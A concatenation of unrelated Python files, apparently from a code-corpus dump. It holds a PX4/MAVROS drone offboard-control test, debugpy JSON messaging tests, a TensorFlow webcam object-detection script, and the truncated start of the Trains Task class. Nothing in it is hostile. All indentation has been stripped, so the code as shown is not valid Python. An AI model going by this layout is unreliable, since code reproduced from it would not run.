# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
# OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
# AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
#***************************************************************************/
#
# @author Andreas Antener <[email protected]>
#
# The shebang of this file is currently Python2 because some
# dependencies such as pymavlink don't play well with Python3 yet.
from __future__ import division
PKG = 'px4'
import rospy
from geometry_msgs.msg import Quaternion, Vector3
from mavros_msgs.msg import AttitudeTarget
from mavros_test_common import MavrosTestCommon
from pymavlink import mavutil
from std_msgs.msg import Header
from threading import Thread
from tf.transformations import quaternion_from_euler
class MavrosOffboardAttctlTest(MavrosTestCommon):
"""
Tests flying in offboard control by sending attitude and thrust setpoints
via MAVROS.
For the test to be successful it needs to cross a certain boundary in time.
"""
def setUp(self):
super(MavrosOffboardAttctlTest, self).setUp()
self.att = AttitudeTarget()
self.att_setpoint_pub = rospy.Publisher(
'mavros/setpoint_raw/attitude', AttitudeTarget, queue_size=1)
# send setpoints in seperate thread to better prevent failsafe
self.att_thread = Thread(target=self.send_att, args=())
self.att_thread.daemon = True
self.att_thread.start()
def tearDown(self):
super(MavrosOffboardAttctlTest, self).tearDown()
#
# Helper methods
#
def send_att(self):
rate = rospy.Rate(10) # Hz
self.att.body_rate = Vector3()
self.att.header = Header()
self.att.header.frame_id = "base_footprint"
self.att.orientation = Quaternion(*quaternion_from_euler(-0.25, 0.5,
0))
self.att.thrust = 0.7
self.att.type_mask = 7 # ignore body rate
while not rospy.is_shutdown():
self.att.header.stamp = rospy.Time.now()
self.att_setpoint_pub.publish(self.att)
try: # prevent garbage in console output when thread is killed
rate.sleep()
except rospy.ROSInterruptException:
pass
#
# Test method
#
def test_attctl(self):
"""Test offboard attitude control"""
# boundary to cross
boundary_x = 200
boundary_y = 100
boundary_z = 20
# make sure the simulation is ready to start the mission
self.wait_for_topics(60)
self.wait_for_landed_state(mavutil.mavlink.MAV_LANDED_STATE_ON_GROUND,
10, -1)
self.log_topic_vars()
self.set_mode("OFFBOARD", 5)
self.set_arm(True, 5)
rospy.loginfo("run mission")
rospy.loginfo("attempting to cross boundary | x: {0}, y: {1}, z: {2}".
format(boundary_x, boundary_y, boundary_z))
# does it cross expected boundaries in 'timeout' seconds?
timeout = 90 # (int) seconds
loop_freq = 2 # Hz
rate = rospy.Rate(loop_freq)
crossed = False
for i in xrange(timeout * loop_freq):
if (self.local_position.pose.position.x > boundary_x and
self.local_position.pose.position.y > boundary_y and
self.local_position.pose.position.z > boundary_z):
rospy.loginfo("boundary crossed | seconds: {0} of {1}".format(
i / loop_freq, timeout))
crossed = True
break
try:
rate.sleep()
except rospy.ROSException as e:
self.fail(e)
self.assertTrue(crossed, (
"took too long to cross boundaries | current position x: {0:.2f}, y: {1:.2f}, z: {2:.2f} | timeout(seconds): {3}".
format(self.local_position.pose.position.x,
self.local_position.pose.position.y,
self.local_position.pose.position.z, timeout)))
self.set_mode("AUTO.LAND", 5)
self.wait_for_landed_state(mavutil.mavlink.MAV_LANDED_STATE_ON_GROUND,
90, 0)
self.set_arm(False, 5)
if __name__ == '__main__':
import rostest
rospy.init_node('test_node', anonymous=True)
rostest.rosrun(PKG, 'mavros_offboard_attctl_test',
MavrosOffboardAttctlTest)
|
test_messaging.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root
# for license information.
from __future__ import absolute_import, division, print_function, unicode_literals
"""Tests for JSON message streams and channels.
"""
import collections
import functools
import json
import io
import pytest
import random
import re
import socket
import threading
import time
from debugpy.common import log, messaging
from tests.patterns import some
# Default timeout for tests in this file.
pytestmark = pytest.mark.timeout(5)
class JsonMemoryStream(object):
"""Like JsonIOStream, but working directly with values stored in memory.
Values are round-tripped through JSON serialization.
For input, values are read from the supplied sequence or iterator.
For output, values are appended to the supplied collection.
"""
json_decoder_factory = messaging.JsonIOStream.json_decoder_factory
json_encoder_factory = messaging.JsonIOStream.json_encoder_factory
def __init__(self, input, output, name="memory"):
self.name = name
self.input = iter(input)
self.output = output
def close(self):
pass
def _log_message(self, dir, data):
format_string = "{0} {1} " + (
"{2!j:indent=None}" if isinstance(data, list) else "{2!j}"
)
return log.debug(format_string, self.name, dir, data)
def read_json(self, decoder=None):
decoder = decoder if decoder is not None else self.json_decoder_factory()
try:
value = next(self.input)
except StopIteration:
raise messaging.NoMoreMessages(stream=self)
value = decoder.decode(json.dumps(value))
self._log_message("-->", value)
return value
def write_json(self, value, encoder=None):
encoder = encoder if encoder is not None else self.json_encoder_factory()
value = json.loads(encoder.encode(value))
self._log_message("<--", value)
self.output.append(value)
class TestJsonIOStream(object):
MESSAGE_BODY_TEMPLATE = '{"arguments": {"threadId": 3}, "command": "next", "seq": %d, "type": "request"}'
MESSAGES = []
SERIALIZED_MESSAGES = b""
@classmethod
def setup_class(cls):
for seq in range(0, 3):
message_body = cls.MESSAGE_BODY_TEMPLATE % seq
message = json.loads(
message_body, object_pairs_hook=collections.OrderedDict
)
message_body = message_body.encode("utf-8")
cls.MESSAGES.append(message)
message_header = "Content-Length: %d\r\n\r\n" % len(message_body)
cls.SERIALIZED_MESSAGES += message_header.encode("ascii") + message_body
def test_read(self):
data = io.BytesIO(self.SERIALIZED_MESSAGES)
stream = messaging.JsonIOStream(data, data, "data")
for expected_message in self.MESSAGES:
message = stream.read_json()
assert message == expected_message
with pytest.raises(messaging.NoMoreMessages) as exc_info:
stream.read_json()
assert exc_info.value.stream is stream
def test_write(self):
data = io.BytesIO()
stream = messaging.JsonIOStream(data, data, "data")
for message in self.MESSAGES:
stream.write_json(message)
data = data.getvalue()
assert data == self.SERIALIZED_MESSAGES
class TestJsonMemoryStream(object):
MESSAGES = [
{"seq": 1, "type": "request", "command": "next", "arguments": {"threadId": 3}},
{"seq": 2, "type": "request", "command": "next", "arguments": {"threadId": 5}},
]
def test_read(self):
stream = JsonMemoryStream(self.MESSAGES, [])
for expected_message in self.MESSAGES:
message = stream.read_json()
assert message == expected_message
with pytest.raises(messaging.NoMoreMessages) as exc_info:
stream.read_json()
assert exc_info.value.stream is stream
def test_write(self):
messages = []
stream = JsonMemoryStream([], messages)
for message in self.MESSAGES:
stream.write_json(message)
assert messages == self.MESSAGES
class MessageHandlerRecorder(list):
def __call__(self, handler):
@functools.wraps(handler)
def record_and_handle(instance, message):
name = handler.__name__
if isinstance(name, bytes):
name = name.decode("utf-8")
record = {"channel": message.channel, "handler": name}
if isinstance(message, messaging.Event):
record.update(
{"type": "event", "event": message.event, "body": message.body}
)
elif isinstance(message, messaging.Request):
record.update(
{
"type": "request",
"command": message.command,
"arguments": message.arguments,
}
)
self.append(record)
return handler(instance, message)
return record_and_handle
def expect(self, channel, inputs, handlers):
expected_records = []
for input, handler in zip(inputs, handlers):
expected_record = {"channel": channel, "handler": handler}
expected_record.update(
{
key: value
for key, value in input.items()
if key in ("type", "event", "command", "body", "arguments")
}
)
expected_records.append(expected_record)
assert expected_records == self
class TestJsonMessageChannel(object):
@staticmethod
def iter_with_event(collection):
"""Like iter(), but also exposes a threading.Event that is set
when the returned iterator is exhausted.
"""
exhausted = threading.Event()
def iterate():
for x in collection:
yield x
exhausted.set()
return iterate(), exhausted
def test_events(self):
EVENTS = [
{
"seq": 1,
"type": "event",
"event": "stopped",
"body": {"reason": "pause"},
},
{
"seq": 2,
"type": "event",
"event": "unknown",
"body": {"something": "else"},
},
]
recorder = MessageHandlerRecorder()
class Handlers(object):
@recorder
def stopped_event(self, event):
assert event.event == "stopped"
@recorder
def event(self, event):
assert event.event == "unknown"
stream = JsonMemoryStream(EVENTS, [])
channel = messaging.JsonMessageChannel(stream, Handlers())
channel.start()
channel.wait()
recorder.expect(channel, EVENTS, ["stopped_event", "event"])
def test_requests(self):
REQUESTS = [
{
"seq": 1,
"type": "request",
"command": "next",
"arguments": {"threadId": 3},
},
{
"seq": 2,
"type": "request",
"command": "launch",
"arguments": {"program": "main.py"},
},
{
"seq": 3,
"type": "request",
"command": "unknown",
"arguments": {"answer": 42},
},
{
"seq": 4,
"type": "request",
"command": "pause",
"arguments": {"threadId": 5},
},
]
recorder = MessageHandlerRecorder()
class Handlers(object):
@recorder
def next_request(self, request):
assert request.command == "next"
return {"threadId": 7}
@recorder
def launch_request(self, request):
assert request.command == "launch"
self._launch = request
return messaging.NO_RESPONSE
@recorder
def request(self, request):
request.respond({})
@recorder
def pause_request(self, request):
assert request.command == "pause"
self._launch.respond({"processId": 9})
raise request.cant_handle("pause error")
stream = JsonMemoryStream(REQUESTS, [])
channel = messaging.JsonMessageChannel(stream, Handlers())
channel.start()
channel.wait()
recorder.expect(
channel,
REQUESTS,
["next_request", "launch_request", "request", "pause_request"],
)
assert stream.output == [
{
"seq": 1,
"type": "response",
"request_seq": 1,
"command": "next",
"success": True,
"body": {"threadId": 7},
},
{
"seq": 2,
"type": "response",
"request_seq": 3,
"command": "unknown",
"success": True,
},
{
"seq": 3,
"type": "response",
"request_seq": 2,
"command": "launch",
"success": True,
"body": {"processId": 9},
},
{
"seq": 4,
"type": "response",
"request_seq": 4,
"command": "pause",
"success": False,
"message": "pause error",
},
]
def test_responses(self):
request1_sent = threading.Event()
request2_sent = threading.Event()
request3_sent = threading.Event()
request4_sent = threading.Event()
def iter_responses():
request1_sent.wait()
yield {
"seq": 1,
"type": "response",
"request_seq": 1,
"command": "next",
"success": True,
"body": {"threadId": 3},
}
request2_sent.wait()
yield {
"seq": 2,
"type": "response",
"request_seq": 2,
"command": "pause",
"success": False,
"message": "Invalid message: pause not supported",
}
request3_sent.wait()
yield {
"seq": 3,
"type": "response",
"request_seq": 3,
"command": "next",
"success": True,
"body": {"threadId": 5},
}
request4_sent.wait()
stream = JsonMemoryStream(iter_responses(), [])
channel = messaging.JsonMessageChannel(stream, None)
channel.start()
# Blocking wait.
request1 = channel.send_request("next")
request1_sent.set()
log.info("Waiting for response...")
response1_body = request1.wait_for_response()
response1 = request1.response
assert response1.success
assert response1.request is request1
assert response1.body == response1_body
assert response1.body == {"threadId": 3}
# Async callback, registered before response is received.
request2 = channel.send_request("pause")
response2 = []
response2_received = threading.Event()
def response2_handler(resp):
response2.append(resp)
response2_received.set()
log.info("Registering callback")
request2.on_response(response2_handler)
request2_sent.set()
log.info("Waiting for callback...")
response2_received.wait()
(response2,) = response2
assert not response2.success
assert response2.request is request2
assert response2 is request2.response
assert response2.body == messaging.InvalidMessageError(
"pause not supported", request2
)
# Async callback, registered after response is received.
request3 = channel.send_request("next")
request3_sent.set()
request3.wait_for_response()
response3 = []
response3_received = threading.Event()
def response3_handler(resp):
response3.append(resp)
response3_received.set()
log.info("Registering callback")
request3.on_response(response3_handler)
log.info("Waiting for callback...")
response3_received.wait()
(response3,) = response3
assert response3.success
assert response3.request is request3
assert response3 is request3.response
assert response3.body == {"threadId": 5}
# Async callback, registered after channel is closed.
request4 = channel.send_request("next")
request4_sent.set()
channel.wait()
response4 = []
response4_received = threading.Event()
def response4_handler(resp):
response4.append(resp)
response4_received.set()
log.info("Registering callback")
request4.on_response(response4_handler)
log.info("Waiting for callback...")
response4_received.wait()
(response4,) = response4
assert not response4.success
assert response4.request is request4
assert response4 is request4.response
assert isinstance(response4.body, messaging.NoMoreMessages)
def test_invalid_request_handling(self):
REQUESTS = [
{
"seq": 1,
"type": "request",
"command": "stackTrace",
"arguments": {"AAA": {}},
},
{"seq": 2, "type": "request", "command": "stackTrace", "arguments": {}},
{"seq": 3, "type": "request", "command": "unknown", "arguments": None},
{"seq": 4, "type": "request", "command": "pause"},
]
class Handlers(object):
def stackTrace_request(self, request):
request.arguments["AAA"]
request.arguments["AAA"]["BBB"]
def request(self, request):
request.arguments["CCC"]
def pause_request(self, request):
request.arguments["DDD"]
output = []
stream = JsonMemoryStream(REQUESTS, output)
channel = messaging.JsonMessageChannel(stream, Handlers())
channel.start()
channel.wait()
def missing_property(name):
return some.str.matching("Invalid message:.*" + re.escape(name) + ".*")
assert output == [
{
"seq": 1,
"type": "response",
"request_seq": 1,
"command": "stackTrace",
"success": False,
"message": missing_property("BBB"),
},
{
"seq": 2,
"type": "response",
"request_seq": 2,
"command": "stackTrace",
"success": False,
"message": missing_property("AAA"),
},
{
"seq": 3,
"type": "response",
"request_seq": 3,
"command": "unknown",
"success": False,
"message": missing_property("CCC"),
},
{
"seq": 4,
"type": "response",
"request_seq": 4,
"command": "pause",
"success": False,
"message": missing_property("DDD"),
},
]
def test_fuzz(self):
# Set up two channels over the same stream that send messages to each other
# asynchronously, and record everything that they send and receive.
# All records should match at the end.
class Fuzzer(object):
def __init__(self, name):
self.name = name
self.lock = threading.Lock()
self.sent = []
self.received = []
self.responses_sent = []
self.responses_received = []
self.done = False
def start(self, channel):
self._worker = threading.Thread(
name=self.name,
target=lambda: self._send_requests_and_events(channel),
)
self._worker.daemon = True
self._worker.start()
def wait(self):
self._worker.join()
def done_event(self, event):
with self.lock:
self.done = True
def fizz_event(self, event):
assert event.event == "fizz"
with self.lock:
self.received.append(("event", "fizz", event.body))
def buzz_event(self, event):
assert event.event == "buzz"
with self.lock:
self.received.append(("event", "buzz", event.body))
def event(self, event):
with self.lock:
self.received.append(("event", event.event, event.body))
def make_and_log_response(self, request):
x = random.randint(-100, 100)
if x < 0:
exc_type = (
messaging.InvalidMessageError
if x % 2
else messaging.MessageHandlingError
)
x = exc_type(str(x), request)
with self.lock:
self.responses_sent.append((request.seq, x))
return x
def fizz_request(self, request):
assert request.command == "fizz"
with self.lock:
self.received.append(("request", "fizz", request.arguments))
return self.make_and_log_response(request)
def buzz_request(self, request):
assert request.command == "buzz"
with self.lock:
self.received.append(("request", "buzz", request.arguments))
return self.make_and_log_response(request)
def request(self, request):
with self.lock:
self.received.append(
("request", request.command, request.arguments)
)
return self.make_and_log_response(request)
def _got_response(self, response):
with self.lock:
self.responses_received.append(
(response.request.seq, response.body)
)
def _send_requests_and_events(self, channel):
types = [random.choice(("event", "request")) for _ in range(0, 100)]
for typ in types:
name = random.choice(("fizz", "buzz", "fizzbuzz"))
body = random.randint(0, 100)
with self.lock:
self.sent.append((typ, name, body))
if typ == "event":
channel.send_event(name, body)
elif typ == "request":
req = channel.send_request(name, body)
req.on_response(self._got_response)
channel.send_event("done")
# Spin until we receive "done", and also get responses to all requests.
requests_sent = types.count("request")
log.info("{0} waiting for {1} responses...", self.name, requests_sent)
while True:
with self.lock:
if self.done:
if requests_sent == len(self.responses_received):
break
time.sleep(0.1)
fuzzer1 = Fuzzer("fuzzer1")
fuzzer2 = Fuzzer("fuzzer2")
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.bind(("localhost", 0))
_, port = server_socket.getsockname()
server_socket.listen(0)
socket1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket1_thread = threading.Thread(
target=lambda: socket1.connect(("localhost", port))
)
socket1_thread.start()
socket2, _ = server_socket.accept()
socket1_thread.join()
try:
io1 = socket1.makefile("rwb", 0)
io2 = socket2.makefile("rwb", 0)
stream1 = messaging.JsonIOStream(io1, io1, "socket1")
channel1 = messaging.JsonMessageChannel(stream1, fuzzer1)
channel1.start()
fuzzer1.start(channel1)
stream2 = messaging.JsonIOStream(io2, io2, "socket2")
channel2 = messaging.JsonMessageChannel(stream2, fuzzer2)
channel2.start()
fuzzer2.start(channel2)
fuzzer1.wait()
fuzzer2.wait()
finally:
socket1.close()
socket2.close()
assert fuzzer1.sent == fuzzer2.received
assert fuzzer2.sent == fuzzer1.received
assert fuzzer1.responses_sent == fuzzer2.responses_received
assert fuzzer2.responses_sent == fuzzer1.responses_received
|
object_detection_test_increase_fps_multithreading.py
|
import cv2
import numpy as np
import os
import sys
import tarfile
import time
import argparse
import tensorflow as tf
import multiprocessing
from threading import Thread
from multiprocessing import Queue, Pool
from mytools.app_utils import FPS, WebcamVideoStream, draw_boxes_and_labels
from object_detection.utils import label_map_util
from object_detection.utils import visualization_utils as vis_util
CWD_PATH = os.getcwd()
MODEL_NAME = 'ssd_mobilenet_v1_coco_2017_11_17'
MODEL_FILE = os.path.join(CWD_PATH, MODEL_NAME + '.tar.gz')
DOWNLOAD_BASE = 'http://download.tensorflow.org/models/object_detection/'
PATH_TO_CKPT = os.path.join(CWD_PATH, MODEL_NAME, 'frozen_inference_graph.pb')
# List of the strings that is used to add correct label for each box.
PATH_TO_LABELS = os.path.join(CWD_PATH, 'object_detection', 'data', 'mscoco_label_map.pbtxt')
NUM_CLASSES = 90
# opener = urllib.request.URLopener()
# opener.retrieve(DOWNLOAD_BASE + MODEL_NAME + '.tar.gz', MODEL_FILE)
# tar_file = tarfile.open(MODEL_FILE)
# for file in tar_file.getmembers():
# file_name = os.path.basename(file.name)
# if 'frozen_inference_graph.pb' in file_name:
# tar_file.extract(file, os.getcwd())
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES,
use_display_name=True)
category_index = label_map_util.create_category_index(categories)
#add for gpu support
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
# config.gpu_options.per_process_gpu_memory_fraction = 0.7
# 物体识别神经网络,向前传播获得识别结果
def detect_objects(image_np, sess, detection_graph):
# Expand dimensions since the model expects images to have shape: [1, None, None, 3]
image_np_expanded = np.expand_dims(image_np, axis=0)
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
boxes = detection_graph.get_tensor_by_name('detection_boxes:0')
# Each score represent how level of confidence for each of the objects.
# Score is shown on the result image, together with the class label.
scores = detection_graph.get_tensor_by_name('detection_scores:0')
classes = detection_graph.get_tensor_by_name('detection_classes:0')
num_detections = detection_graph.get_tensor_by_name('num_detections:0')
# Actual detection.
(boxes, scores, classes, num_detections) = sess.run(
[boxes, scores, classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
# Visualization of the results of a detection.
rect_points, class_names, class_colors = draw_boxes_and_labels(
boxes=np.squeeze(boxes),
classes=np.squeeze(classes).astype(np.int32),
scores=np.squeeze(scores),
category_index=category_index,
min_score_thresh=.5
)
return dict(rect_points=rect_points, class_names=class_names, class_colors=class_colors)
# 定义用于多进程执行的函数word,每个进程执行work函数,都会加载一次模型
def worker(input_q, output_q):
# Load a (frozen) Tensorflow model into memory.
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
sess = tf.Session(graph=detection_graph, config=config)
fps = FPS().start()
while True:
fps.update()
frame = input_q.get()
frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
output_q.put(detect_objects(frame_rgb, sess, detection_graph))
fps.stop()
sess.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-src', '--source', dest='video_source', type=int,
default=0, help='Device index of the camera.')
parser.add_argument('-wd', '--width', dest='width', type=int,
default=480, help='Width of the frames in the video stream.')
parser.add_argument('-ht', '--height', dest='height', type=int,
default=360, help='Height of the frames in the video stream.')
args = parser.parse_args()
input_q = Queue(10) # fps is better if queue is higher but then more lags
output_q = Queue()
for i in range(1):
t = Thread(target=worker, args=(input_q, output_q))
t.daemon = True
t.start()
video_capture = WebcamVideoStream(src=args.video_source,
width=args.width,
height=args.height).start()
fps = FPS().start()
while True:
frame = video_capture.read()
input_q.put(frame)
t = time.time()
if output_q.empty():
pass # fill up queue
else:
font = cv2.FONT_HERSHEY_SIMPLEX
data = output_q.get()
rec_points = data['rect_points']
class_names = data['class_names']
class_colors = data['class_colors']
for point, name, color in zip(rec_points, class_names, class_colors):
cv2.rectangle(frame, (int(point['xmin'] * args.width), int(point['ymin'] * args.height)),
(int(point['xmax'] * args.width), int(point['ymax'] * args.height)), color, 3)
cv2.rectangle(frame, (int(point['xmin'] * args.width), int(point['ymin'] * args.height)),
(int(point['xmin'] * args.width) + len(name[0]) * 6,
int(point['ymin'] * args.height) - 10), color, -1, cv2.LINE_AA)
cv2.putText(frame, name[0], (int(point['xmin'] * args.width), int(point['ymin'] * args.height)), font,
0.3, (0, 0, 0), 1)
cv2.imshow('Video', frame)
fps.update()
print('[INFO] elapsed time: {:.2f}'.format(time.time() - t))
if cv2.waitKey(1) & 0xFF == ord('q'):
break
fps.stop()
print('[INFO] elapsed time (total): {:.2f}'.format(fps.elapsed()))
print('[INFO] approx. FPS: {:.2f}'.format(fps.fps()))
video_capture.stop()
cv2.destroyAllWindows()
|
task.py
|
import atexit
import os
import signal
import sys
import threading
import time
from argparse import ArgumentParser
from tempfile import mkstemp
try:
# noinspection PyCompatibility
from collections.abc import Callable, Sequence as CollectionsSequence
except ImportError:
from collections import Callable, Sequence as CollectionsSequence
from typing import Optional, Union, Mapping, Sequence, Any, Dict, Iterable, TYPE_CHECKING
import psutil
import six
from pathlib2 import Path
from .backend_api.services import tasks, projects, queues
from .backend_api.session.session import Session, ENV_ACCESS_KEY, ENV_SECRET_KEY
from .backend_interface.metrics import Metrics
from .backend_interface.model import Model as BackendModel
from .backend_interface.task import Task as _Task
from .backend_interface.task.development.worker import DevWorker
from .backend_interface.task.repo import ScriptInfo
from .backend_interface.util import get_single_result, exact_match_regex, make_message, mutually_exclusive
from .binding.absl_bind import PatchAbsl
from .binding.artifacts import Artifacts, Artifact
from .binding.environ_bind import EnvironmentBind, PatchOsFork
from .binding.frameworks.fastai_bind import PatchFastai
from .binding.frameworks.pytorch_bind import PatchPyTorchModelIO
from .binding.frameworks.tensorflow_bind import TensorflowBinding
from .binding.frameworks.xgboost_bind import PatchXGBoostModelIO
from .binding.joblib_bind import PatchedJoblib
from .binding.matplotlib_bind import PatchedMatplotlib
from .config import config, DEV_TASK_NO_REUSE, get_is_master_node
from .config import running_remotely, get_remote_task_id
from .config.cache import SessionCache
from .debugging.log import LoggerRoot
from .errors import UsageError
from .logger import Logger
from .model import Model, InputModel, OutputModel, ARCHIVED_TAG
from .task_parameters import TaskParameters
from .utilities.args import argparser_parseargs_called, get_argparser_last_args, \
argparser_update_currenttask
from .utilities.dicts import ReadOnlyDict, merge_dicts
from .utilities.proxy_object import ProxyDictPreWrite, ProxyDictPostWrite, flatten_dictionary, \
nested_from_flat_dictionary, naive_nested_from_flat_dictionary
from .utilities.resource_monitor import ResourceMonitor
from .utilities.seed import make_deterministic
# noinspection PyProtectedMember
from .backend_interface.task.args import _Arguments
if TYPE_CHECKING:
import pandas
import numpy
from PIL import Image
class Task(_Task):
"""
The ``Task`` class is a code template for a Task object which, together with its connected experiment components,
represents the current running experiment. These connected components include hyperparameters, loggers,
configuration, label enumeration, models, and other artifacts.
The term "main execution Task" refers to the Task context for current running experiment. Python experiment scripts
can create one, and only one, main execution Task. It is a traceable, and after a script runs and Trains stores
the Task in the **Trains Server** (backend), it is modifiable, reproducible, executable by a worker, and you
can duplicate it for further experimentation.
The ``Task`` class and its methods allow you to create and manage experiments, as well as perform
advanced experimentation functions, such as autoML.
.. warning::
Do not construct Task objects directly. Use one of the methods listed below to create experiments or
reference existing experiments.
For detailed information about creating Task objects, see the following methods:
- Create a new reproducible Task - :meth:`Task.init`
.. important::
In some cases, ``Task.init`` may return a Task object which is already stored in **Trains Server** (already
initialized), instead of creating a new Task. For a detailed explanation of those cases, see the ``Task.init``
method.
- Create a new non-reproducible Task - :meth:`Task.create`
- Get the current running Task - :meth:`Task.current_task`
- Get another (different) Task - :meth:`Task.get_task`
.. note::
The **Trains** documentation often refers to a Task as, "Task (experiment)".
"Task" refers to the class in the Trains Python Client Package, the object in your Python experiment script,
and the entity with which **Trains Server** and **Trains Agent** work.
"Experiment" refers to your deep learning solution, including its connected components, inputs, and outputs,
and is the experiment you can view, analyze, compare, modify, duplicate, and manage using the Trains
**Web-App** (UI).
Therefore, a "Task" is effectively an "experiment", and "Task (experiment)" encompasses its usage throughout
the Trains.
The exception to this Task behavior is sub-tasks (non-reproducible Tasks), which do not use the main execution
Task. Creating a sub-task always creates a new Task with a new Task ID.
"""
TaskTypes = _Task.TaskTypes
NotSet = object()
__create_protection = object()
__main_task = None # type: Optional[Task]
__exit_hook = None
__forked_proc_main_pid = None
__task_id_reuse_time_window_in_hours = float(config.get('development.task_reuse_time_window_in_hours', 24.0))
__detect_repo_async = config.get('development.vcs_repo_detect_async', False)
__default_output_uri = config.get('development.default_output_uri', None)
class _ConnectedParametersType(object):
argparse = "argument_parser"
dictionary = "dictionary"
task_parameters = "task_parameters"
@classmethod
def _options(cls):
return {
var for var, val in vars(cls).items()
if isinstance(val, six.string_types)
}
def __init__(self, private=None, **kwargs):
"""
.. warning::
**Do not construct Task manually!**
Please use :meth:`Task.init` or :meth:`Task.get_task`
"""
if private is not Task.__create_protection:
raise UsageError(
'Task object cannot be instantiated externally, use Task.current_task() or Task.get_task(...)')
self._repo_detect_lock = threading.RLock()
super(Task, self).__init__(**kwargs)
self._arguments = _Arguments(self)
self._logger = None
self._last_input_model_id = None
self._connected_output_model = None
self._dev_worker = None
self._connected_parameter_type = None
self._detect_repo_async_thread = None
self._resource_monitor = None
self._calling_filename = None
# register atexit, so that we mark the task as stopped
self._at_exit_called = False
@classmethod
def current_task(cls):
# type: () -> Task
"""
Get the current running Task (experiment). This is the main execution Task (task context) returned as a Task
object.
:return: The current running Task (experiment).
"""
return cls.__main_task
@classmethod
def init(
cls,
project_name=None, # type: Optional[str]
task_name=None, # type: Optional[str]
task_type=TaskTypes.training, # type: Task.TaskTypes
reuse_last_task_id=True, # type: Union[bool, str]
continue_last_task=False, # type: Union[bool, str]
output_uri=None, # type: Optional[str]
auto_connect_arg_parser=True, # type: Union[bool, Mapping[str, bool]]
auto_connect_frameworks=True, # type: Union[bool, Mapping[str, bool]]
auto_resource_monitoring=True, # type: bool
):
# type: (...) -> Task
"""
Creates a new Task (experiment) if:
- The Task never ran before. No Task with the same ``task_name`` and ``project_name`` is stored in
**Trains Server**.
- The Task has run before (the same ``task_name`` and ``project_name``), and (a) it stored models and / or
artifacts, or (b) its status is Published , or (c) it is Archived.
- A new Task is forced by calling ``Task.init`` with ``reuse_last_task_id=False``.
Otherwise, the already initialized Task object for the same ``task_name`` and ``project_name`` is returned.
.. note::
To reference another Task, instead of initializing the same Task more than once, call
:meth:`Task.get_task`. For example, to "share" the same experiment in more than one script,
call ``Task.get_task``. See the ``Task.get_task`` method for an example.
For example:
The first time the following code runs, it will create a new Task. The status will be Completed.
.. code-block:: py
from trains import Task
task = Task.init('myProject', 'myTask')
If this code runs again, it will not create a new Task. It does not store a model or artifact,
it is not Published (its status Completed) , it was not Archived, and a new Task is not forced.
If the Task is Published or Archived, and run again, it will create a new Task with a new Task ID.
The following code will create a new Task every time it runs, because it stores an artifact.
.. code-block:: py
task = Task.init('myProject', 'myOtherTask')
d = {'a': '1'}
task.upload_artifact('myArtifact', d)
:param str project_name: The name of the project in which the experiment will be created. If the project does
not exist, it is created. If ``project_name`` is ``None``, the repository name is used. (Optional)
:param str task_name: The name of Task (experiment). If ``task_name`` is ``None``, the Python experiment
script's file name is used. (Optional)
:param TaskTypes task_type: The task type.
Valid task types:
- ``TaskTypes.training`` (default)
- ``TaskTypes.testing``
- ``TaskTypes.inference``
- ``TaskTypes.data_processing``
- ``TaskTypes.application``
- ``TaskTypes.monitor``
- ``TaskTypes.controller``
- ``TaskTypes.optimizer``
- ``TaskTypes.service``
- ``TaskTypes.qc``
- ``TaskTypes.custom``
:param bool reuse_last_task_id: Force a new Task (experiment) with a previously used Task ID,
and the same project and Task name.
.. note::
If the previously executed Task has artifacts or models, it will not be reused (overwritten)
and a new Task will be created.
When a Task is reused, the previous execution outputs are deleted, including console outputs and logs.
The values are:
- ``True`` - Reuse the last Task ID. (default)
- ``False`` - Force a new Task (experiment).
- A string - You can also specify a Task ID (string) to be reused,
instead of the cached ID based on the project/name combination.
:param bool continue_last_task: Continue the execution of a previously executed Task (experiment)
.. note::
When continuing the executing of a previously executed Task,
all previous artifacts / models/ logs are intact.
New logs will continue iteration/step based on the previous-execution maximum iteration value.
For example:
The last train/loss scalar reported was iteration 100, the next report will be iteration 101.
The values are:
- ``True`` - Continue the the last Task ID.
specified explicitly by reuse_last_task_id or implicitly with the same logic as reuse_last_task_id
- ``False`` - Overwrite the execution of previous Task (default).
- A string - You can also specify a Task ID (string) to be continued.
This is equivalent to `continue_last_task=True` and `reuse_last_task_id=a_task_id_string`.
:param str output_uri: The default location for output models and other artifacts. In the default location,
Trains creates a subfolder for the output. The subfolder structure is the following:
<output destination name> / <project name> / <task name>.< Task ID>
The following are examples of ``output_uri`` values for the supported locations:
- A shared folder: ``/mnt/share/folder``
- S3: ``s3://bucket/folder``
- Google Cloud Storage: ``gs://bucket-name/folder``
- Azure Storage: ``azure://company.blob.core.windows.net/folder/``
.. important::
For cloud storage, you must install the **Trains** package for your cloud storage type,
and then configure your storage credentials. For detailed information, see
`Trains Python Client Extras <./references/trains_extras_storage/>`_ in the "Trains Python Client
Reference" section.
:param auto_connect_arg_parser: Automatically connect an argparse object to the Task?
The values are:
- ``True`` - Automatically connect. (default)
- ``False`` - Do not automatically connect.
- A dictionary - In addition to a boolean, you can use a dictionary for fined grained control of connected
